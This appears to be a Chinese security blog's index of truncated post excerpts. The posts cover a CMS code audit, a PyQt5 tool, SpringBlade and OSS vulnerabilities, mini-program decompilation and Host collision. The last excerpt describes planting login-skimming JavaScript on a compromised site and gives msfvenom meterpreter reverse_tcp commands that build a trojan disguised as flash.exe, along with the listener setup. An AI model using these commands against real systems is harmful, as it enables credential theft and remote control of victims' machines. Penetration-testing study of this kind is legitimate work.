初识php代审——baijiacms
百家CMS代码审计1、环境准备baijiacms phpstudy8.1.1.3 apache2.4.39+mysql5.7.26+php5.3.29 2、搭建环境先搭建一个百家数据库,为搭建站点做准备。 直接使用phpstudy搭建好站点,并访问 连接数据库,并配置系统管理员 然后就成功创建了 3、路由审计路由关系是代码审计第一步,我们可以通过找到代码、目录与网站页面的对应关系,让我们更好的验证漏洞 先走一下基础流程,大概的看一下目录结构,有个大概的印象 大概目录解释 12345678addons 插件api 接口assets 静态文件attachment 上传目录cache 缓存目录config 系统文件include 系统文件system 后端代码 开始找路由关系,一些根基比较深的cms,往往有自己独家的路由设置,有使用手册的话,还需要通过cms的使用手册上去梳理路由关系。但是有个小捷径,就是可以直接对比站点的url和源码的目录结构,这个方法很快,更便于理解。 我们点进修改密码功能点,然后看看ur...
开发日记——python(1)
python图形化(1)作为一个向往图形化工具的网安人,频繁使用一些cmd脚本,多cmd窗口,总是让我心烦意乱。于是心生一计,为什么不能自己做一个综合型的图形化工具页面呢,那最便捷的脚本语言python语言肯定首当其冲。于是有了这一篇开发小日记的诞生。鄙人不会开发,只是小懂门道,大佬轻点喷。 下面就看一看基本实现的思路。 1234561、构建基本UI界面2、UI转为py文件3、相关事件绑定函数4、一些UI的小细节5、多页面联合6、转换exe文件。 1、构建基本UI界面这是我们是基于pyqt5这个py库实现的,所以要先安装一些库 12pip install PyQt5pip install PyQt5-tools 安装之后,我们直接全局搜索一个文件(我用的everything),designer.exe,这个就是我们设计UI的可执行文件。 直接创建一个 设置一个你想要的程序的基本页面大小 然后就左边的状态栏就是一些基本的图窗、标签、按钮。下面就介绍一些常用的吧! 还有 然后就设计你想要的界面 2、UI转为py文件然后ctr+s保存为.ui文件,然后使用以下命令把U...
typora+hexo博客图片踩坑速记
typora破解版+hexo+smms图床图床相关配置网上教程千千万,不知道翻了多久才找到成功配置。 故写此文记录一下: 不要用Picgo(APP),反正我没成功过。 这里推荐使用Picgo-Core 直接“下载或更新”,就会弹一个下载条,等下载完后 查看typora的缓存目录下的picgo,一般在 C:\Users\Yf\AppData\Roaming\Typora\picgo\win64 然后再点击配置文件 把里面的代码替换为下述代码,并替换API 12345678910111213{ "picBed": { "current": "smms-user", "uploader": "smms-user", "smms-user": { "Authorization": "这里替换成你自己的" ...
Host碰撞实战篇
Host碰撞反向代理顺口提一嘴…正向代理:代理服务器代理客户端,例如我们搭建代理科学上网 反向代理:代理服务器代理服务端,测试网站时我们常常使用浏览器插件<–Wappalyzer–>,有时候就会看到Nginx反向代理。反向代理就是有一台代理服务器代理网站站点,例如网站真实站点的ip为101.131.20.162,其代理服务器IP就是121.161.241.36,我们访问时只能访问到121.161.241.36,而不能知道其真实ip。这里也是反向代理的一个目的之一,隐藏真实。 反向代理如何实现? 准备: 1、一台有nginx的服务器 2、一个域名,该域名DNS解析到我们的nginx服务器代理 此处我们就不使用https了,只是做个小实验 1234567891011121314151617181920212223242526272829303132333435363738//安装并启动nginxsudo apt install nginxsudo systemctl start nginxsudo systemctl enable nginx//配置企业常用的反向代理...
springblade漏洞总结
前言在挖src碰巧遇到了springBlade框架,就此浅显总结一下 简介&特征 SpringBlade是一个基于Spring Boot和Spring Cloud的微服务架构框架,它是由商业级项目升级优化而来的综合型项目。Springblade是基于spring-boot开发的,接口泄露、sql注入他也存在。 sringblade的特征1 1icon_hash="1047841028" 特征2 在页面加载过程中,会出现以下的加载页面,和最下方的https://bladex.vip,此时我们就可以将这个地址放到fofa上去扩大资产 1fofa:body="https://bladex.vip" 特征3 在路径中若发现blade,这个字段,也基本可以确定是blade框架 123/api/blade-user/info/api/blade-auth/oauth/captcha..... 常见漏洞&实例漏洞一:接口泄露正常接口路径:/api/blade-system/,不过开发人员一...
小程序反编译
小程序解密+反编译 将访问的小程序进行解密和反向编译拿到部分源码,然后对源码进行安全审计,分析出其中可能存在的信息泄露或者说路径等一些关键信息。 前置环境准备1、nodejs环境安装(https://nodejs.org/en,官网安装即可) 2、解密反编译工具(wxapkg:https://github.com/wux1an/wxapkg/releases/tag/v1.5.0) 3、微信小程序(一般大厂的小程序可能存在无法反编译,选一些简单点的就行) 反编译最初目录结构示例: 12345678910111213141516171819202122232425262728291myApp/2 ├── app.json ——小程序全局配置文件,用于定义小程序的基本属性和页面路径。) 3 ├── app.wxss ——全局样式表,定义整个小程序的公共样式。)4 ├── app.js ——小程序的入口文件,可以在这里进行全局数据初始化、监听、处理等。5 ├── project.config.json ——项目配置文件,用于设置编译模式、...
OSS云存储攻防
阿里云OSS对象攻防简介 阿里云对象储存(OSS),是阿里云对外提供的海量、安全、低成本、高可靠的云存储服务。数据以对象(Object)的形式存储在OSS的存储空间/存储桶(Bucket )中,并指定Object的文件名(Key)作为其唯一标识。您可以通过本文档提供的简单的REST接口,在任何时间、任何地点、任何互联网设备上进行上传和下载数据。基于OSS,您可以搭建出各种多媒体分享网站、网盘、个人和企业数据备份等基于大规模数据的服务。 上述概念介绍 Bucket:用户用来管理所存储Object的储物空间。Object:OSS存储数据的基本单元。Key:当存储文件(Object)时,需要指定此Object的名称(Key),后续您将通过这个Key来获取该Object的内容。 Key也可以用来模拟文件夹的一些属性。Data:存储的数据本体。 常见漏洞1、Bucket权限配置错误-公开访问在默认情况下创建的Bucket桶是private权限,如果在错误配置的情况下,给了Listobject权限,就会导致可遍历存储桶。 如果选择了””公有读/公有读写”,就会存在两...
模拟实战权限维持-钓鱼
权限维持实战:权限维持,获取登录记录 前提:拿到了web权限,例如:www-data:shell权限 然后确认其接收用户密码文件login_check.php,写入js动作(该代码不会被输出到页面,也比较隐蔽),远程连接接收用户密码文件get.php 在get.php文件中包含文件写入代码 每当有人登录时,就会远程访问get.php,我们就可以从newfile.txt中得到用户密码 还可以直接远程连接beef,只需要修改js代码为 2、钓鱼实战1、msf生成木马文件12345678910msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.43LPORT=6666 -f exe > flash.exe2、下载官方文件-保证安装正常3、压缩捆绑文件-解压提取运行4、MSF 配置监听状态use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.43.43set lport 6666run...







